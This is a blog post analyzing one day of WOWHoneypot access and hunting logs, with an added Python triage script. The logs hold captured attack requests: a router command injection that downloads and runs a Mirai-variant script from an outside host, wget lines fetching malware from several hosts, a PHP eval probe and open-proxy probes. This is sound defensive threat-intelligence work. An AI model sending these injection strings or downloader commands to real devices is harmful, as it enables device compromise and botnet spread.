S-Owl

WOWHoneypot quick analysis (day 16)

This is a quick analysis of the WOWHoneypot logs for Tuesday, 2018/6/19 (day 16 of operation).


Today's access log totals 176 entries. A quiet day.

$ awk '/06-19/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
52 [2018-06-19 "GET /
11 [2018-06-19 "HEAD /
5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /xampp/phpmyadmin/index.php
2 [2018-06-19 "GET /www/phpMyAdmin/index.php
2 [2018-06-19 "GET /typo3/phpmyadmin/index.php
2 [2018-06-19 "GET /tools/phpMyAdmin/index.php
2 [2018-06-19 "GET /pmd/index.php
2 [2018-06-19 "GET /pma-old/index.php
2 [2018-06-19 "GET /pmamy/index.php
2 [2018-06-19 "GET /pmamy2/index.php
2 [2018-06-19 "GET /PMA/index.php
2 [2018-06-19 "GET /pma/index.php
2 [2018-06-19 "GET /PMA2/index.php
2 [2018-06-19 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-19 "GET /phpMyAdminold/index.php
2 [2018-06-19 "GET /phpMyAdmin.old/index.php
2 [2018-06-19 "GET /phpmyadmin-old/index.php
2 [2018-06-19 "GET /phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/index.php
2 [2018-06-19 "GET /phpmyadmin2/index.php
2 [2018-06-19 "GET /phpmyadmin1/index.php
2 [2018-06-19 "GET /phpmyadmin0/index.php
2 [2018-06-19 "GET /phpadmin/index.php
2 [2018-06-19 "GET /mysqladmin/index.php
2 [2018-06-19 "GET /mysql-admin/index.php
2 [2018-06-19 "GET /myadmin/index.php
2 [2018-06-19 "GET /myadmin2/index.php
2 [2018-06-19 "GET /index.php
2 [2018-06-19 "GET /db/index.php
2 [2018-06-19 "GET /dbadmin/index.php
2 [2018-06-19 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-19 "GET /admin/pma/index.php
2 [2018-06-19 "GET /admin/phpMyAdmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin2/index.php
2 [2018-06-19 "GET /admin/mysql/index.php
2 [2018-06-19 "GET /admin/mysql2/index.php
2 [2018-06-19 "GET /admin/index.php
1 [2018-06-19 "PROPFIND /
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /phpmyadmin/scripts/db_documentation.init.php
1 [2018-06-19 "GET /phpMyadmin_bak/index.php
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43

There are many distinct request types, so I'll exclude / and index.php:

5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43

There are too many to go through and time is short, so I'll only pick out the ones that caught my attention (shown in red). The ones in blue have already been analyzed on earlier days.

1. Mirai variant exploiting a D-Link vulnerability

5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

The daily count has gone 1 → 8 → 33 → 16 → 5. It seems to be calming down a little.

2. POST requests

POST /db_session.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die( (string)(111111111*9) );

It POSTs to a PHP file, so what exactly it is targeting is unclear, but it appears to be the same kind of request as the one that arrived the previous day.

3. CONNECT method

CONNECT 133.130.126[.]119:43 HTTP/1.1
HOST: 133.130.126[.]119
User-Agent: RPS/HTTP PROXY

CONNECT www.baidu[.]com:443 HTTP/1.1
Host: www.baidu.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

CONNECT cn.bing[.]com:443 HTTP/1.1
Host: cn.bing[.]com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

These look like probes checking whether the host can be abused as an open proxy for relaying traffic via the CONNECT method.

4. Reconnaissance

The User-Agent is Wget or the Accept-Encoding is identity, but there is nothing particularly suspicious about them; I think these are just reconnaissance.

GET /webfig/roteros.info HTTP/1.1
Accept: */*
Connection: close
User-Agent: Wget(linux)

GET /moo HTTP/1.1
Accept: */*
User-Agent: Wget(linux)

GET /sitemap.xml HTTP/1.1
Accept-Encoding: identity

GET /robots.txt HTTP/1.1
Accept-Encoding: identity

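To turn the awk | sort | uniq -c summary above into repeatable triage, here is an added example (my own code, not part of the original post or of WOWHoneypot) that parses constructed access_log lines in the field layout the one-liner implies, counts requests per day, and sorts them into the four buckets discussed in this post plus the phpMyAdmin path scan; the exact WOWHoneypot log format and the bucket heuristics are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Constructed sample lines (not from the post) in the layout the article's awk one-liner
# implies ($1 = "[date", $5 = '"METHOD', $6 = path); the real field layout is an assumption.
SAMPLE_LOG = """\
[2018-06-19 03:12:45+0900] 198.51.100.7 192.0.2.10:80 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200
[2018-06-19 03:40:02+0900] 198.51.100.8 192.0.2.10:80 "GET /phpMyAdmin/index.php HTTP/1.1" 200
[2018-06-19 04:01:11+0900] 198.51.100.8 192.0.2.10:80 "GET /pma/index.php HTTP/1.1" 200
[2018-06-19 05:22:09+0900] 198.51.100.9 192.0.2.10:80 "POST /db_session.init.php HTTP/1.1" 200
[2018-06-19 06:15:30+0900] 198.51.100.10 192.0.2.10:80 "CONNECT www.baidu.com:443 HTTP/1.1" 200
[2018-06-19 07:00:00+0900] 198.51.100.11 192.0.2.10:80 "GET /robots.txt HTTP/1.1" 200
[2018-06-18 23:59:59+0900] 198.51.100.12 192.0.2.10:80 "GET / HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^\[(\S+) [^\]]*\] (\S+) \S+ "(\S+) (\S+)')
PMA_RE = re.compile(r"(phpmyadmin|pma|myadmin|mysql|dbadmin|phpadmin)")
BENIGN = {"/", "/robots.txt", "/sitemap.xml", "/favicon.ico"}

def classify(method, target):
    """Coarse triage bucket for one request line (heuristics, not a full signature set)."""
    decoded = unquote(target).lower()
    if method == "CONNECT":
        return "connect-proxy-probe"          # section 3: open-proxy relay checks
    if re.search(r";\s*(wget|curl|sh|bash)\b", decoded):
        return "command-injection"            # section 1: shell separator + downloader
    if PMA_RE.search(decoded):
        return "phpmyadmin-scan"              # the long list of /pma*/index.php paths
    if method == "POST" and decoded.endswith(".php"):
        return "php-post-probe"               # section 2: POSTs to odd .php names
    if decoded in BENIGN:
        return "recon-benign"                 # section 4: robots.txt, sitemap, etc.
    return "other"

def summarize(log_text, day="2018-06-19"):
    """Replicate the awk | sort | uniq -c summary for one day and bucket the results."""
    requests, buckets = Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != day:
            continue
        _, _, method, target = m.groups()
        requests[(method, target)] += 1
        buckets[classify(method, target)] += 1
    return requests, buckets

if __name__ == "__main__":
    for (method, target), n in summarize(SAMPLE_LOG)[0].most_common():
        print(f"{n:3d} {method} {target}")
```

Run against a real access_log by replacing SAMPLE_LOG with the file contents; the second counter returned by summarize() gives the per-bucket totals used for the day's triage.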

The hunting log is as follows.

$ awk '/06-19/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
5 [2018-06-19 wget hxxp://185.62.190[.]191/r
1 [2018-06-19 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 [2018-06-19 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
1 [2018-06-19 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 [2018-06-19 wget -c hxxp://60.250.99[.]131:9998/liux


That's all for today.